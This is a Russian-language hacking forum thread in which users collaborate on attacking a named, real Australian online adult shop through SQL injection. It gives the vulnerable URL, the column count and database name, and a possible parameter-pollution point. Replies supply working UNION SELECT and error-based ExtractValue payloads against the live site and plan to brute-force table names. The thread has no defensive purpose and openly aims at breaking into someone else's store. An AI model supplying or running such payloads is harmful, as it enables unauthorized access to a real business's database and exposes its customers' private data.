Всем привет!

Никак не могу расковырять автралийский сексшоп)) с такой вот скулей:


Code:
http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=1'

Вручную испробовал уже все известные и неизвестные мне методы. Плюс, как я понял, там вообще нет information_shema. Все, что определил, так это количество полей - 6 и название DB - discr_data.

Всякие Havij и sqlmap ничего не дали.

Плюс здесь вроде HPP


Code:
http://www.discretionadultstore.com.au/dvds-c-37.html?pto=20&pto=_BLA_BLA_BLA_&pfrom=0&page=2&ppp=60&n958468=v913722

, где pto= - уязвимый параметр (по последнему значению)

В оригинале было вроде что-то типа:


Code:
.../dvds-c-37%26n958468%3Dv913722.html?.....

Тоже ноги не смог приделать))

Кто поможет справится?

ubepkr said:
↑ (https://antichat.live/posts/3913709/)
Всем привет!
Никак не могу расковырять автралийский сексшоп)) с такой вот скулей:

Code:
http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=1'

Вручную испробовал уже все известные и неизвестные мне методы. Плюс, как я понял, там вообще нет information_shema. Все, что определил, так это количество полей - 6 и название DB - discr_data.
Всякие Havij и sqlmap ничего не дали.
Плюс здесь вроде HPP

Code:
http://www.discretionadultstore.com.au/dvds-c-37.html?pto=20&pto=_BLA_BLA_BLA_&pfrom=0&page=2&ppp=60&n958468=v913722

, где pto= - уязвимый параметр (по последнему значению)
В оригинале было вроде что-то типа:

Code:
.../dvds-c-37%26n958468%3Dv913722.html?.....

Тоже ноги не смог приделать))
Кто поможет справится?




Code:
http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=-1+union+select+version(),12222,311111,411111,51111 1,611111-- -

атрибут alt главного логотипа сайта будет содержать версию ну и далее по аналогии, если не понятно, то переходишь по этой ссылке, открываешь исходный код страницы и ищешь версию ну и крутишь себе дальше, в чём сложность?

nopony said:
↑ (https://antichat.live/posts/3913729/)

Code:
http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=-1+union+select+version(),12222,311111,411111,51111 1,611111-- -

атрибут alt главного логотипа сайта будет содержать версию ну и далее по аналогии, если не понятно, то переходишь по этой ссылке, открываешь исходный код страницы и ищешь версию ну и крутишь себе дальше, в чём сложность?


Проблема в считывании названий таблиц, как я понял.

Error based так то тоже выводит

http://www.discretionadultstore.com...tValue(1,concat(0x3 a,(select(version())))))=1 (http://www.discretionadultstore.com.au/evolved-bendable-you-too-p-99.html?bPath=1_2&cPath=1+or(ExtractValue(1,concat(0x3a,(select(vers ion())))))=1)

Понял. Судя по всему url парситься гдет внутри по символу "_" так что его использовать нельзя, значит нужно брутить таблицы на имена, не содержащие в себе "_" и молиться, чтоб и имена полей(их тоже брутить) тоже не содержали этот символ

nopony said:
↑ (https://antichat.live/posts/3913729/)
атрибут alt главного логотипа сайта будет содержать версию ну и далее по аналогии, если не понятно, то переходишь по этой ссылке, открываешь исходный код страницы и ищешь версию ну и крутишь себе дальше, в чём сложность?


дык это понятно, но мало что дает. Сложность именно в


Br@!ns said:
↑ (https://antichat.live/posts/3913731/)
считывании названий таблиц


Если только брутить, то это грустно... прогнал на часто встречающиеся имена (штук 500), все мимо.